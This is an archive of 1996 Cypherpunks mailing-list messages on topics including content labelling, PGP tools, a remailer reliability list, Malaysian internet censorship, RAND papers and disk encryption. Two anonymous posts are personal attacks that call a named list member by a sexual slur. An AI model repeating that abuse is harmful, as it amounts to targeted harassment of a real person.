However, talk of "compulsory PICS" really must mean that all content 
be labelled with a PICS protocol label (presumably inside the 
resource itself) according to _at_least_one_ globally or nationally 
mandated value system.  Even with a descriptive rather than an 
evaluative value system (see ABA Chairman's recent speech at above 
link) I think it would take years to come up with a descriptive value 
system which would be generally useful for filtering material 
according to child protection, cultural specific issues (like 
Singapore banning horse race tipping and astrology) and protecting 
adults/employees from violence, erotica, gambling etc. etc.

Then the value system would be impossibly complex. Then, how would 
you decide whether something was properly labelled.  

This is probably off topic for Cypherpunks (if that is indeed 
possible) so I won't say any more.

- Robin


. Robin Whittle                                               .
. http://www.ozemail.com.au/~firstpr   firstpr@ozemail.com.au .
. 11 Miller St. Heidelberg Heights 3081 Melbourne Australia   .
. Ph +61-3-9459-2889    Fax +61-3-9458-1736                   .
. Consumer advocacy in telecommunications, especially privacy .
.                                                             .
. First Principles      - Research and expression - music,    .
.                         music industry, telecommunications  .
.                         human factors in technology adoption.
.                                                             .
. Real World Interfaces - Hardware and software, especially   .
.                         for music                           .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Mon, 9 Dec 1996 06:14:44 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Please post Eudora PGP plugin URL
Message-ID: <3.0.1.32.19961209061226.0127c62c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:52 PM 12/8/96 -0800, Lucky Green wrote:

>>If you want to be automatically notified of new versions, send e-mail to
>>gt6525c@prism.gatech.edu with the subject of "eppi news", and the following
>>message body:
>
>Just FYI, while the plugin is still available, email to this address has
>been bouncing for weeks. It is therefore impossible to submit bug reports
>or subscribe to the EPPI mailing list. If somebody on this list knows the
>current address of the EPPI author, please post it.

The current address of the author of the Eudora plug-in is Damon Gallaty
<dgal@cad.gatech.edu>.  

I have been coorisponding with him on a couple of odd problems with the
software.  (Implemenation issues more than bugs.)  He has been very
responsive.  (In fact, I need to send him another bug report tonight about
failing to deal with line wrap in signatures.)

So far the set of plug-ins have been very useful.  I have been pretty happy
with it so far.  (It does have the problem of not word wrapping before
applying the PGP sig and defaulting to the last key if you do not set one
in config.txt.)

All in all, worth the download.

---
|        "Spam is the Devil's toothpaste!" - stuart@teleport.com         |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 9 Dec 1996 06:52:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199612091450.GAA07475@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk mix pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@rigel.cyberpass.net> cpunk pgp pgponly hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp pgponly hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash latent cut ek mix reord middle ?";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"death"} = "<x@deathsdoor.com> cpunk pgp hash latent post";
$remailer{"reno"} = "<middleman@cyberpass.net> cpunk mix pgp hash middle latent cut ek reord ?";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.
remailer@crynwr.com is _not_ a remailer.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix)
(weasel squirrel)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the nym or weasel (newnym style) nymservers.

The cyber nymserver is quite reliable for outgoing mail (which is
what's measured here), but is exhibiting serious reliability problems
for incoming mail.

The squirrel and winsock remailers accept PGP encrypted mail only.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. This seems to be fixed now.

The penet remailer is closed.

Last update: Mon 9 Dec 96 6:45:04 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
cyber    alias@alias.cyberpass.net        +***+**+*+**    32:58  99.98%
jam      remailer@cypherpunks.ca          ************    14:36  99.97%
nym      config@nym.alias.net             ####***#*###      :48  99.97%
lucifer  lucifer@dhp.com                  ++++++++++++    38:32  99.96%
lead     mix@zifi.genetics.utah.edu       +++*+++-++-+  1:00:18  99.93%
middle   middleman@jpunix.com             -.----------  4:01:26  99.93%
reno     middleman@cyberpass.net          -.---------   3:15:16  99.74%
squirrel mix@squirrel.owl.de              --+++-+++++   1:40:17  99.68%
dustbin  dustman@athensnet.com            __.-+++-++++  7:14:49  99.66%
weasel   config@weasel.owl.de             --+++-+++-+   1:39:24  99.50%
haystack haystack@holy.cow.net            #** **#*#**+     4:58  99.42%
replay   remailer@replay.com              +**** *-- -*  1:22:47  99.41%
exon     remailer@remailer.nl.com         #*#***#+####     6:25  99.29%
extropia remail@miron.vip.best.com        -- -- .. --   9:05:48  94.66%
winsock  winsock@rigel.cyberpass.net         - - -----  3:43:35  93.66%
balls    remailer@huge.cajones.com               #****  1:37:33  74.17%
mix      mixmaster@remail.obscura.com     ._.--++-.     8:37:03  71.73%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Mon, 9 Dec 1996 09:15:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Malaysian Netropolis and Net-regs, from The Netly News
Message-ID: <Pine.GSO.3.95.961209091528.24859C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Mon, 9 Dec 1996 09:15:12 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: Malaysian Netropolis and Net-regs, from The Netly News

The Netly News
December 9, 1996
http://netlynews.com/

The Malaysian Solution
By Declan McCullagh (declan@well.com)
 
       My first thought when I arrived in Kuala Lumpur was that it was
   dirty, at least compared to whisper-clean Singapore, where I had just
   been. Yet the city was fully alive -- not just with hawker stalls but
   with a newfound sense of optimism.
   
       That's because Malaysia, long a sleepy jungle backwater, is
   carefully preparing an area just south of the capital to be the Asian
   technology center, a no-taxes-here free trade zone, the place to be
   for all things cyber. It will be patterned after Penang, an island off
   Malaysia's northwest coast that's home to one of the largest
   collections of chip manufacturers in the world. The way Prime Minister
   Mahathir Mohamad describes it, fiber will line the streets of the $8
   billion "Multimedia Super Corridor" and dollars will flow into the
   coffers of Western businesses that settle here. Malaysia is busy
   crafting a Netropolis.
   
       Dr. Tommi Chen, the CEO of asiapac.net, explains the government's
   plan to me over satay and bowls of chee cheong fun. We're waiting out
   the monsoon rain in one of the countless Malay-Chinese eateries in
   Petaling Jaya, a town about 15 miles from the capital, Kuala Lumpur.
   
       "This region is exploding," he says. "Everyone is competing to be
   the information-technology hub. The government is trying to attract
   the best to create another Silicon Valley." Sun Microsystems, Ernst &
   Young and Microsoft have already announced plans to shift Asian
   operations to this tropical city. That influx will doubtless be
   hastened in February when intellectual property and digital signature
   laws are set to be introduced.
   
       To attract firms, the government is unabashedly pro-business. "I
   think Malaysia will leapfrog other countries in the region as a
   business center," Chen says. "The prime minister and the deputy prime
   minister championed the Internet themselves."
   
       Yet just like everywhere else that embraces rapid datafication, a
   Net connection brings with it overseas ideas and values that alarm
   authorities in this strict Islamic state, which still refuses to sign
   the International Declaration of Human Rights and has a police force
   that can indefinitely detain individuals deemed a threat to national
   security. In a country where chaste kisses -- a tepid buss on the
   cheek! -- are chopped out of television broadcasts, what's a poor
   government censor to do when images from
   alt.binaries.pictures.erotica.pornstar flow through Malaysian
   cyberspace?
   
       The answer may lie in the history books. North of Singapore, south
   of Thailand, straddling the South China Sea, Malaysia was settled by
   the British in 1795. The country won its independence in 1957, but an
   internal Communist uprising quickly destablized the young government.
   Then, on May 13, 1969, members of a Chinese political party took to
   the streets of Kuala Lumpur to celebrate a strong showing in a
   parliamentary election. Malay-Chinese riots flared for four days and
   hundreds died. The government responded by taking extreme measures to
   reduce ethnic friction, echoes of which exist today in draconian laws
   punishing people (such as newspaper editors) who "incite" racial
   tension.
  
       In this atmosphere, Prime Minister Mahathir prospered. Once a
   critic of autocratic government, he dismantled the formerly
   independent judiciary after a court threatened his grip on power in
   1987. His other censor-happy feats include once banning the Wall
   Street Journal and the Far East Economic Review. No viable opposition
   party exists. Lim Guan Eng, an opposition leader, is being tried for
   sedition. Local newspapers are uniformly pro-government. Issues of
   Western magazines with articles critical of Mahathir somehow never
   make it to newsstands.
   
       Malaysian netizens have a ready answer for these criticisms of
   their country. To them, Malaysia may not be ready for the kind of
   freedoms the West enjoys. "Most Asians see Westerners as being too
   liberal with too many things," a Chinese manager at a technology firm
   told me. The country's perception of liberty, I begin to understand,
   is seen through the lens of communist threats and the May 13 racial
   riots. With freedom, perhaps, comes instability, uncertainty... chaos.
   
       That's why Mahathir is faced with an exquisitely delicate
   balancing act: providing enough freedom to attract Western companies
   and American-educated workers accustomed to it, while meeting the
   demands of powerful Islamic fundamentalists who would put Senator Exon
   to shame.
   
       "The pornography laws exist. They will just extend these laws to
   the Net," says Chen. The rain has slowed to a light patter. We're
   almost ready to return to his office, across the street, where a score
   of 20-somethings work late into the night. He concludes: "Malaysia is
   Muslim. They have to do it -- they have no choice. They know there is
   no foolproof control, but they have to do it anyway."
   
       My next visit is to the office of Dr. Mohamed Awang Lah, the head
   of Jaring, the only other licensed and government-approved Internet
   provider in Malaysia. Like asiapac.net, Jaring is owned by the state.
   (Three illicit providers, however, apparently exist.)
   
       "We block about a hundred web sites, otherwise people complain,"
   Awang Lah tells me. This, then, is the balancing act: "If we are too
   open, people complain. If we are too closed, people complain." This is
   an epiphany for me: the Notorious 100, presumably the same web sites
   blocked by the government of Singapore! It's a token gesture, not too
   much, not too little. In a lot of ways, it's a far better solution
   than the U.S. Congress's ham-handed Communications Decency Act, now on
   the Supreme Court's calendar.
   
       "The government will not regulate the Internet," Awang Lah says.
   "The only part we don't like, that is not acceptable to the culture,
   to the religion, is pornography... There are also some restrictions on
   religious content. But there is no intention to regulate the free flow
   of discussion." (Except for anti-Islam or anti-Mahathir criticisms,
   I'd wager.)
   
       Still, Malaysia seems to follow a pattern of strict laws and lax
   enforcement. Sure, sexually explicit materials may be banned by law.
   But just a block from my hotel in downtown Kuala Lumpur, I was able to
   buy three porn videos -- two American, one Japanese -- for 50 ringgit,
   or U.S. $7 each, from a sidewalk vendor. Perhaps there's some hope for
   the Net after all.
   
###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Mon, 9 Dec 1996 09:42:33 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: The Science Generations
Message-ID: <9612091741.AA08891@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


If I may offer another opinion...

I ran a BBS for about three years straight off
of floppies on an Apple ][+, without any
hardware failures or disk problems.

   Ryan

---------- Previous Message ----------
To: frantz
cc: cypherpunks
From: dthorn @ gte.net (Dale Thorn) @ smtp
Date: 12/06/96 07:48:16 PM
Subject: Re: The Science Generations

Bill Frantz wrote:
> At  1:12 AM 12/6/96 -0800, Dale Thorn wrote:
> >I would guess that those who became and remained successful technically
> >(as opposed to becoming "business people") were using HP computers and
> >such in the 1970s.  I for one was a heavy user then, and PETs, Apples,
> >Radio Shack, etc. computers weren't reliable enough for serious work.

> I guess those people using VisiCalc on the Apple ][ weren't doing serious
> work :-).  (Also the many small businesses using these early machines for
> AR, Accounting etc.)  Me, I was doing OS programming on IBM 370s.

Let's talk about some real data processing.  dBase II on CP/M computers
(or certain proprietary hardware with adaptor cards), circa 1980-1982,
would be a good example.  If you had the right stuff, say, an HP-120 or
HP-125, or even an 80 series with the adaptor, and HP floppy drives, you
could process all day long for (years?) with scarcely a hitch.  You try
to put something like that on an Apple II with Apple floppies (using
whatever software was available), and you couldn't do the job.  The
machine and/or drives would quit in a few days, if not the first day,
and might even erase your diskettes in the process (a common occurrence
in those days).

In early 1985, just for fun, I had an HP-71 pocket computer hooked up to
a LaserJet printer and a couple of HP portable floppies, and printed my
store's databases on it.  Multiple indexes, thousands of records, each
index printed complete every day in separate copies for each salesman.
I wouldn't dream of trying that with an IBM or Apple floppy system.

Hard disks?  I *never* heard of an HP microcomputer hard disk crash in
those days, short of dropping the computer onto the floor while writing
a file.  We used to pull the wall plugs on our HP's while writing to a
file, with no bad effect.  Try that on an IBM or Apple circa <= 1985.

Computer hardware?  One thing I enjoyed doing for customers was pulling
a RAM card out of an HP-86 while it was running a program, then forcing
the card back into the slot.  Usually pulling the card had no effect,
then, putting it back in would generally reset the program.
Surge protectors?  Never sold one.  Not needed with HP's then.

An Apple II (like the other toy computers from 1975 to 1982) was a
hobbyist computer, which required frequent cleaning and scrubbing
internally to keep it running.  A pencil eraser was a common tool...

And let's not forget Apple and IBM attitudes: When I had HP's, if I ever
needed service, HP did it themselves, professionally (using static mats
etc.) and promptly.  You wouldn't find Apple or IBM offering to repair
their own microcomputers in those days (or ever).  For good reason!

Cost of service?  HP's contracts were usually 3% to 5% of the item cost
per year, compared to the "industry standard" of 15%.  Not a bad deal.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 9 Dec 1996 11:33:28 -0800 (PST)
To: stewarts@ix.netcom.com
Subject: Re: Mykotronx update
In-Reply-To: <1.5.4.32.19961209024043.005a5b30@popd.ix.netcom.com>
Message-ID: <199612091933.LAA19520@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>http://www.rnbo.com/mykoweb/geninfo.htm
>        Headquarted in Torrance, California, Mykotronx employs approximately
>        110 people. The company was founded in 1979 as Myko Enterprises; 
>        it incorporated and became Mykotronx, Inc. in 1987. 
>        In 1995, Mykotronx became a part of Rainbow Technologies Inc. 
>        (NASDAQ: RNBO), a world leader for intellectual property protection. 
>....
>        Anticipating higher production volumes, in October 1995, 
>        Mykotronx opened a new facility that has dramatically enhanced its
>        capacity for testing and programming cryptographic microprocessors. 
>        The facility expands annual programming and test capability to more 
>        than 1.2 million devices, with potential expansion to 5 million
>units. 
>

the obvious question is: does mykotronx currently have some kind of
crypto product that is selling that well? if not, then what the
@#$%^&* do they have up their sleeve? is this part of the clipper
fallout? or is it a new plan?

encyphering minds want to know..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rosario Family <samiam@coqui.net>
Date: Mon, 9 Dec 1996 07:51:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Fwd: take me off the list]
Message-ID: <32ABFCA0.B53@coqui.net>
MIME-Version: 1.0
Content-Type: text/plain

me too samiam@coqui.net


To: cypherpunks@toad.com
Subject: take me off the list
From: Bryondp@aol.com
Date: Sun, 8 Dec 1996 19:47:48 -0500
Sender: owner-cypherpunks@toad.com

take me off the list





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foodie@netcom.com (Bryna Bank/Jamie Lawrence)
Date: Mon, 9 Dec 1996 12:39:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Secure Erase for PCs?
Message-ID: <199612092039.MAA09769@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi all -

I know this has been discussed multiple times, but
archive searching has turned up nothing.

What freely available tools are there for securely
erasing a disk under DOS and Windows?

Ideally I'd like a tool for each, but pointers
to either are much appreciated.

Thanks,

-j




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Mon, 9 Dec 1996 12:00:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: [ADMINISTRATIVIUM] One-time pads
Message-ID: <199612092000.NAA02778@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


Many forgeries are traceable with mathematical certainty to feebleminded 
Timmy C[ocksucker] Mayflower's poison keyboard.

    /\
   /..\  Timmy C[ocksucker] Mayflower
  /_\/_\




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 9 Dec 1996 10:26:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Baran on Net Security
Message-ID: <1.5.4.32.19961209182328.00679df8@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


RAND has put on it Web site eleven "classics" on distributed
communications, most of them by Paul Baran. They offer good 
background to current debate on secrecy, security and 
cryptography. Here are the contents of No. 9 on security.

     http://www.rand.org/publications/RM/RM3765/

Memorandum
RM-3765-PR
August 1964

On Distributed Communications:
IX Security, Secrecy, and Tamper-Free Considerations

Paul Baran


Contents, Preface, Summary, Foreword

I.   Introduction

II.  The Paradox of the Secrecy About Secrecy 

     The Assumption of a Clear Dichotomy Between Classified 
     and Unclassified Subject Matter
     Cost and Result of Present-Day Cryptographic Equipment
     On Secrecy of Secrecy

III. Some Fundamentals of Cryptography 

     Digital Transmission
     Layers of Encryption

IV.  Implications for the Distributed Network System 

     Link-by-Link Cryptography in the Distributed Network
     End-to-End Cryptography in the Distributed Network
     Genealogy of the Keys
     Generation and Distribution of Keys
     Protection Offered by Semi-Random Path Choice

V.   A "Devil's Advocate" Examination

Appendix

Use of a Function of N-Boolean Variables as a Second-Order
Modifier for "Next-Key" Generation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pavel Korensky <pavelk@dator3.anet.cz>
Date: Mon, 9 Dec 1996 04:33:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Protect against physical theft of the harddisk ??
Message-ID: <199612091234.NAA00444@zenith.dator3.anet.cz>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

I have one problem which I would like to consult with you.
I need to protect the data on the computer harddisk against physical theft.

Current situation:

Computer with several harddisks - approx. 9 GB. On this computer, the following
OS are used: Linux, DOS, Windows NT. The data on this computer must be
accessible from all operating systems. Encryption of files must be transparent
to user and encryption algorithm must be "strong".

Because I am not able to find any disk encryption software which is able to run
on all these platforms, I decided to use the following temporary solution:

Add one more computer with Linux OS. On this computer, there will be only a
small root partition with necessary Linux components. All other disk space will
be encrypted with IDEA, using the /dev/loop. This machine will be some kind of
secure file server.
On the second machine, where the user works, there will be partitions with
operating systems, necessary utilities and the TCP/IP stack for DOS/Windows, NT
and Linux. The data and application disks will be mounted via NFS and user will
work with files from file server.
The computers will be interconnected with Fast Ethernet. This mini-network is
NOT connected to the Internet, so the NFS (in)security should not be a problem. 
Also, both computers will be placed in the same room (distance approx. 3 m), so
there should be no problem with tapping/data capturing on the Fast Ethernet
connection.

I have the following questions.

Can anybody see some major security hole in this system ?
How fast will be this system ?
Anybody has any idea if there is some more sophisticated solution for this
problem ? 
Anybody heard about some strong disk encryption which is able to rund under
Windows NT, Linux and DOS ? It seems that the Win NT are the major problem. I am
not able to find any disk encryption for NT.
Anybody is able to port Secure File System to Windows NT ? I am trying to port
this program under Linux, but I am not the NT system programmer.

Thanx for any comments, help, ideas etc.


Best regards


PavelK


--
****************************************************************************
*                    Pavel Korensky (pavelk@dator3.anet.cz)                *
*     DATOR3 Ltd., Modranska 1895/17, 143 00 Prague 4, Czech Republic      *
*  PGP key fingerprint: 00 65 5A B3 70 20 F1 54  D3 B3 E4 3E F8 A3 5E 7C   *
****************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Mon, 9 Dec 1996 14:39:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: [ANNOUNCEMENT] Secure envelopes
Message-ID: <199612092202.OAA25870@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Here, Timmy Mayflower descends into total 
inanity. He should have a cold shower and/or a 
Turkish coffee.

       |\    \ \ \ \ \ \ \      __
       |  \    \ \ \ \ \ \ \   | O~-_ Timmy Mayflower
       |   >----|-|-|-|-|-|-|--|  __/
       |  /    / / / / / / /   |__\
       |/     / / / / / / /




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 9 Dec 1996 11:36:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Advent of Netwar
Message-ID: <1.5.4.32.19961209193256.006865f8@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


A RAND publication relates to the administration's focus on 
borderless crime and/or dissent as national security threats:

The Advent of Netwar.

J. Arquilla, D.F. Ronfeldt

118 pp, 1996. $15.00 ISBN: 0833024140

Key concepts:

   Cybernetics -- Military aspects; 
   Electronic intelligence; 
   Military art and science -- Technological innovations;
   Communications, Military -- Technological aspects; 
   Electronic countermeasures 

Abstract: The information revolution is leading to the rise of 
network forms of organization, with unusual implications for 
how societies are organized and conflicts are conducted. "Netwar" 
is an emerging consequence. The term refers to societal conflict 
and crime, short of war, in which the protagonists are organized 
more as sprawling "leaderless" networks than as tight-knit 
hierarchies. Many terrorists, criminals, fundamentalists, and 
ethno-nationalists are developing netwar capabilities. A new 
generation of revolutionaries and militant radicals is also 
emerging, with new doctrines, strategies, and technologies that 
support their reliance on network forms of organization. Netwar 
may be the dominant mode of societal conflict in the 21st century. 
These conclusions are implied by the evolution of societies, 
according to a framework presented in this RAND study. The 
emergence of netwar raises the need to rethink strategy and 
doctrine to conduct counternetwar. Traditional notions of war 
and low-intensity conflict as a sequential process based on 
massing, maneuvering, and fighting will likely prove inadequate 
to cope with nonlinear, swarm-like, information-age conflicts in 
which societal and military elements are closely intermingled. 

-----

There is a summary of this document and ordering info at:

   http://www.rand.org/publications/MR/MR789.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 9 Dec 1996 11:42:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Chaum to Step Aside
Message-ID: <1.5.4.32.19961209193858.00688674@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.msnbc.com/news/45558.asp


According to knowledgeable sources,
Digicash b.v., the Dutch-based privately held
Internet payment company that was founded and
is chaired by Chaum, is in the market for a new
top executive.

The 6-year-old company plans to make
Chaum, the ponytailed inventor of Digicash's
innovative payment system, chief technology
officer and to hire a new CEO to run the
company.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 9 Dec 1996 12:06:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: What OS/2 software?
Message-ID: <9612092004.AA21831@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi!

I am off from the list nowadays so please reply directly.

Can anybody point me to the most accepted crypto softwares running under
OS/2?

I already have PGP 2.6.3i

Here is my shopping list:
- - file encryption utility other than PGP, *if advisable*
- - GUI shell (Aegis Shell style, if possible)
- - hard drive on-the-fly encryption (I used CryptDisk in DOS)
- - swap deleter
- - file wiper

- - any other program that would take care of a security issue the I still
ignore about OS/2 (I'm absolutely new to it)

- - any must-read OS/2 specific security-related document(s)

I am looking for software that has been peer-reviewed and that is widely 
accepted among Cypher/Coder Punks.

As a result of thoses replies, I will create a web page dedicated to OS/2
security applications.

Regards

jfa

- -- 
Jean-Francois Avon, Pierrefonds(Montreal) QC Canada
 DePompadour, Societe d'Importation Ltee:  Fine Limoges porcelain and Crystal
 JFA Technologies:    R&D Physicists, Eng, Techies, LabView stuff, etc
PGP encryption keys at:     http://w3.citenet.net/users/jf_avon
                               and:
http://bs.mit.edu:8001/pks-toplev.html
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
ID# 5B51964D  : 152ACCBCD4A481B0 254011193237822C 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAgUBMqv/bciycyXFit0NAQFqcAgAh2e3qveaBXyAhAwm4P35cM8Ho6PnW2i8
pfqpHOzKtYyoACgWT40Q/L9Rv7Zq2S7YTY07+Ges56nwczKQdCFigH8PTUas5TOJ
WC+sddxZCWT57XxEA2NGW/DBH90lrRJ+0Yq2e42So1KzQ/5RWcpZPIL60fEusrc0
I1E+qCcGkxFtm/1ISwIHwtpx3E7u4l8jMZy71dX+/Wp1LfSinbudjkTWYkCYTifW
XL5q/wHTQ3/+UetoczQL7k6o1teOBJA1NIjZ5BRlvDfAYwhz1W1f8IbV8l/2tP0q
r3sNaDN0hBdMzvz4tWXdMYObkr5tE7XSl5EJLUkRb3O15+8UK4XB6g==
=lzne
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Mon, 9 Dec 1996 14:18:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <3.0.32.19961205133306.006952e4@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:14 PM 12/4/96 EST, Bovine Remailer wrote:
>At 11:26 AM 12/4/1996, Matthew J. Miszewski wrote:
[snippo]
>If I earned my very own money honestly and I choose to lend it only to
>Albanians, you believe that this would be inefficient and, therefore,
>forbidden.  

Actually I didnt say anything about private lending.  But as this thread
goes on you seem to assume much.

>In other words, you do not believe that I should be able
>to lend money to anybody I please.  You can call it "equal access to
>capital" or "denial of opportunity", but the clearest and simplest
>description is that you believe I should not be able to lend my money
>to whomever I please.  Instead of pretending otherwise, just say "I
>believe you should not be able to lend your own money which you earned
>honestly to anybody you please.  I believe you should be allowed only
>to lend money in these circumstances..."

I dont assume that anyone (or any corporation) has earned their money
honestly.  Quite often that is not the case.  I have said a few times
already that I *do* believe in limited regulation.  And apparently you
believe that ad hominem is cool.

>Of course, non-discrimination is a vague term.  

Actually it is not.  I am an employment law attroney.  I know the
definition.  I know also what I need to do to prove it.  I also know that
many times the definition (legal) fails to meet the reality of the
situation.  But as I said before, we do not live in a perfect society.

>Let's say I lend money
>only to people I know.  I only know Albanians.  Am I therefore a
>racist in my lending practices?  That is unclear.

See above.

>
>Am I racist in my choice of friends?  Perhaps we should make that
>illegal.
>

Perhaps we should argue irrelevant things.

>>I have never suggested that provably bad credit risks should be given money.
>
>What is irksome is that you are talking about Other People's Money and
>not your own.  The perspective tends to change when it's your own
>savings on the line.
>

Actually, in my case, it absolutely does not.  But as I said above, you
appear to continually assume things.  My perspective doesnt change, maybe
yours does.

